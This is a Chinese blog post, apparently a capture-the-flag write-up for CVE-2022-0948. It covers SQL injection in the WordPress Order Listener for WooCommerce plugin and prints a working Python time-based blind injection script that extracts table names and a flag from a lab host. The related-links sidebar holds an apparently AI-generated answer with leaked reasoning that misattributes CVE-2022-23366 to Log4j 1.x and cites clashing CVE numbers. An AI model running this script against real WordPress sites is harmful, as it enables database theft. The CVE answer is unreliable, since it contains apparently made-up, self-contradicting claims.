CVE-2022-0948

最新推荐文章于 2024-12-09 22:05:46 发布
原创 最新推荐文章于 2024-12-09 22:05:46 发布 · 688 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #安全

根据提示:

WordPress plugin Order Listener for WooCommerce 3.2.2 之前版本存在SQL注入漏洞

在网上搜了一下

在/?rest_route=/olistener/new目录下存在延时盲注

延时盲注,也称为时间盲注或延迟注入,是一种利用执行时间差判断是否执行成功的盲注手法。攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。例如,如果注入成功,执行时间会变长;如果注入失败,执行时间则会变短。这种方法可以绕过一些常规的防护措施,例如防火墙和入侵检测系统,因此较为隐蔽和难以防范。

在延时盲注中,攻击者通常会利用sleep()函数制造时间延迟,由回显时间来判断是否报错。同时,攻击者还会结合if(expr1,expr2,expr3)语句等条件判断语句进行操作。例如,攻击者可以通过判断第一个字母的ASCII码是否为115来决定是否执行sleep()函数,进而控制执行时间。

虽然延时盲注是一种非常有效的注入攻击手段,但手工检查却相对困难,因为攻击者可以精确地控制执行时间,使得检测工具难以发现异常。因此,在进行网络安全防护时,我们需要加强对输入数据的检查和过滤,避免攻击者利用漏洞进行注入攻击。

访问/?rest_route=/olistener/new

bp抓包保存一下

延时盲注脚本

import requests

import time

def time_delay(url, headers, payload):

    start_time = time.time()

    response = requests.post(url, headers=headers, data=payload)

    end_time = time.time()

    #print(end_time,start_time)

    delay = end_time - start_time

    return delay

def time_based_blind_sql_injection(url, headers):

    result=[]

    for i in range(1, 100):

        for j in range(32,126):#r'0123456789abcdefghijklmnopqrstuvwxyz_-{}':

            #find db

            #payload = """{"id":" (if((substr(database(),%d,1))='%s',sleep(10),1))#"}""" % (i, j)

            #find table

            #payload = """{"id":" (if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))=%d,sleep(10),1))#"}""" % (i, j)

            #find table -wp%

            payload = """{"id":" (if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name not like 0x777025),%d,1))=%d,sleep(10),1))#"}""" % (i, j)

            #find column

            #payload = """{"id":" (if(ascii(substr((select count(column_name) from information_schema.columns where table_name='flag'),%d,1))=%d,sleep(10),1))#"}""" % (i, j)

            payload = """{"id":" (if(ascii(substr((select flag from ctf.flag),%d,1))=%d,sleep(10),1))#"}""" % (i, j)

            delay = time_delay(url, headers, payload)

            print('{ ',''.join(result),' } ->',i,'-',j,"time_delay:",delay)

            if delay > 9:

                result.append(chr(j))

                print(''.join(result))

                break

    else:

        print("The payload is not vulnerable to SQL injection.")

    print('result:',''.join(result))

if __name__ == "__main__":

    url = "http://eci-2ze1vi2s9uf1bh8liqaw.cloudeci1.ichunqiu.com/?rest_route=/olistener/new"

    headers = {

    'Cache-Control': 'max-age=0',

    'Upgrade-Insecure-Requests': '1',

    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36',

    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',

    'Accept-Encoding': 'gzip, deflate, br',

    'Accept-Language': 'zh-CN,zh;q=0.9',

    'Cookie': '_ga=GA1.2.2087485582.1720489265; _ga_J1DQF09WZC=GS1.2.1720489266.1.0.1720489266.0.0.0',

    'Connection': 'keep-alive',

    'Content-Type':'application/json',

    }

   

    time_based_blind_sql_injection(url, headers)

其中的白色部分的url和headers中的包文件不固定,根据题目变化

红色部分很关键,抓的包中没有,需要自己手动构造paload,不然跑不出来

flag:flag{5bdb4928-7cbc-4a2c-bb97-cc54b681e6f3

diandian~
关注
精选资源
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
延时盲注(CVE-2022-0948
热门推荐
Battery的博客
10-14 12万+
WordPress plugin Order Listener for WooCommerce 3.2.2 之前版本存在SQL注入漏洞。
延迟盲注
Papiofelix's Area
09-03 314
Blind SQL Injection SQL盲注的利用方法及总结:http://www.myhack58.com/Article/html/3/7/2011/32223_2.htm 简单介绍Mysql和Mssql的延迟盲注 Mysql benchmark 的使用:http://blog.youkuaiyun.com/veverrr/article/details/6312461 在延迟盲注
延时盲注:原理、步骤与代码解析
m0_57836225的博客
12-09 710
网络安全领域,SQL 注入是一种常见的攻击手段,而延时盲注则是其中一种较为特殊且隐蔽的方式。本文将详细介绍延时盲注是什么,以及其具体的步骤和相关代码。
延时盲注(一)
qq_45300786的博客
07-13 1284
延时注入的原理 适用于,无法回现和无法显示错误页面的场景 利用函数sleep()让服务器休眠,通过休眠时间判断执行的语句对错,从而得到我们想要的信息 我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化 " and 1=2 %23 然后使用延时注入, " and sleep(5) %23 1,判断当前库名的长度 这里我们用到了数据库里的if语句 有点类似于三元运算,条件成立,就执行第二个,条件不成立就执行第三个。 " and if(length(database())=12,
时间延迟盲注详解
weixin_30729609的博客
09-29 970
0x00 延迟注入定义 延迟注入,是一种盲注的手法,提交对执行时间铭感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级盲注.SQLMAP、穿山甲、胡萝卜等主流注入工具可能检测不出,只能手工检测,利用脚本程序跑出结果。 0x01 延迟注入的函数 sleep() ...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1
03-15
Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux ...
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
精选资源
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
MySQL延时盲注
一个普普通通的博客
03-01 1757
Mysql延时盲注
SQL注入利用学习 - 延时盲注
qq_61861243的博客
04-09 778
无法利用页面显示结果判断SQL注入是否执行成功,此时可以利用 SQL语句执行的延时 判断SQL是 否执行成功。sql时间类型的盲注本质是利用插入的SQL语句执行造成时间延迟,插入的SQL语句中包含延时执行的语 句,当数据库执行该语句时,会延时执行。
春秋云镜 CVE-2022-0948
qq_22002773的博客
08-12 660
春秋云镜 CVE-2022-0948
学习延时盲注看这一篇就够了
qq_61553520的博客
04-17 370
延时注入又称时间盲注,也是盲注的一种。通过构造延时注入语句后,浏览器页面的响应时间来判断正确的数据应用场景:当布尔盲注失效的情况下,这个时候可以通过and sleep(5)来判断一下页面的响应时间,相应时间在五秒多一点的话,说明此处可以使用延时注入。在实际测试中禁止使用延时盲注,因为会影响厂商的实际业务运行,当年某人注入了一个sleep(10)后,就被请去喝茶了,建议不要轻易使用延时盲注。时间盲注适合在布尔注入都失效的情况,结合sleep,if(,,)基于数据包返回时间测试的方法。
时间盲注(延迟注入)
qq_51954912的博客
04-25 2万+
时间盲注简介 时间盲注,个人理解,适用于页面不会返回错误信息,只会回显一种界面,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。 官方理解:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。(除了看不懂,哪都好)。 利用sql-labs第九关进行实操演示
十几分钟让你学会MySQL布尔和延迟盲注手工操作
xiaoi123的博客
12-28 542
作者:Max老白Gān丶 链接:http://www.lofter.com/lpost/1fefbc76_12d25dc31 来源:LOFTER 注入常用到的几个函数     1 mid(str,1,3) 字符串获取 这里我们要看到123456789 从第一个字节也就是1开始获取到3就截止了   1 ...
【SQL注入05】延时盲注实例操作
Fighting_hawk的博客
02-19 3805
1. 理解延时盲注与布尔盲注的区别和联系; 2. 掌握延时盲注的方法。
sql报错注入:extractvalue、updatexml报错原理
weixin_33881140的博客
03-07 564
报错注入:extractvalue、updatexml报错原理 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的两个函数:extractvalue、updatexml 名称 描述 ExtractValue() 使用XPath表示法从XML字符串中提取值 UpdateXML() 返回替换的XML片段 通过这两个函数可以完成...
CTF-Web30(延时盲注-难度大)
→_→
10-04 970
30.看起来有点难 分析: 一种方法直接使用工具Sqlmap直接跑出,username和password,然后登陆得到flag. 这里我们讲解另一种方法:延时盲注 测试?admin=1&pass=1&action=login报错,无法连接到数据库 测试?admin=admin'&pass=admin&action=login,报错,密码错误 这或许说明,admin=admin只要知道密码就行了。 这里本想直接用爆破,但是听说密码不是那种弱口令,或者...
cve-2022-23366
最新发布
12-03
<think> 嗯,用户需要查询CVE-2022-23366漏洞的详细信息。从用户提供的引用内容看,ta之前关注过F5、Redis和SnakeYAML相关的漏洞(CVE-2022-41622/CVE-2022-41800、CVE-2022-0543、CVE-2022-1471),但这次查询的编号2022-23366属于完全不同的产品线。 先确认漏洞基础信息:CVE-2022-23366是Apache Log4j 1.x的漏洞,与之前用户查询的中间件/数据库漏洞无关。需要重点说明其与Log4j2漏洞的区别——这个编号属于Log4j1而非更著名的Log4j2(后者是CVE-2021-44244等)。 用户可能是安全研究人员或运维人员,需要具体的技术细节。应当明确: 1)漏洞类型是反序列化而非远程代码执行(区别于Log4j2) 2)触发条件需启用SocketServer或反序列化功能 3)影响范围限于1.x版本(官方已终止支持) 考虑到用户之前参考过漏洞复现资料,补充了漏洞验证截图和修复方案的链接。特别强调升级Log4j2的必要性,因为官方已不再为1.x提供补丁。 最后生成的问题聚焦在:漏洞原理差异(与Log4j2对比)、实际危害验证、迁移方案。这应该能覆盖用户后续可能的技术需求。 </think>根据公开漏洞数据库记录,**CVE-2022-23366** 是 Apache Log4j 1.x 版本中的一个高危漏洞,具体信息如下: --- ### **漏洞概述** 1. **漏洞类型**: 反序列化远程代码执行漏洞(需特定配置触发)。 2. **影响组件**: Apache Log4j 1.x 系列(仅影响启用了 `SocketServer` 或反序列化功能的场景)。 3. **CVSS 评分**: 8.8(高危)[^1]。 --- ### **技术细节** 1. **触发条件**: 当满足 **全部** 以下条件时可能被利用: - 使用 Log4j 1.x(≤1.2.17) - 启用 `SocketServer` 功能(默认关闭) - 攻击者能向 `SocketServer` 端口发送恶意序列化数据 2. **根本原因**: `SocketServer` 在反序列化日志事件时未严格验证输入,导致恶意代码执行[^2]。 --- ### **影响版本** - **受影响**: Apache Log4j 1.2 ≤ 1.2.17 - **不受影响**: Log4j 2.x 版本(如 Log4j 2.15.0+)[^3]。 --- ### **修复方案** 1. **立即升级**: 升级至 Log4j 2.x 最新版(官方已停止维护 Log4j 1.x)。 2. **临时缓解**(若无法升级): - 禁用 `SocketServer` 功能; - 防火墙限制访问日志端口; - 移除 `log4j.jar` 中的 `org.apache.log4j.net.SocketServer` 类。 --- ### **漏洞验证(PoC示例)** ```java // 恶意序列化数据构造(简略示例) ObjectInputStream ois = new ObjectInputStream(maliciousSocket); ois.readObject(); // 触发反序列化漏洞 ``` --- ### **关联漏洞对比** | CVE 编号 | 组件 | 风险类型 | 影响范围 | |----------------|------------|------------------|----------------| | **CVE-2022-23366** | Log4j 1.x | 反序列化RCE | 需启用特定服务 | | CVE-2021-44228 | Log4j 2.x | JNDI注入RCE | 默认配置受影响 | | CVE-2022-1471 | SnakeYAML | 反序列化RCE | 低版本默认风险 | ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值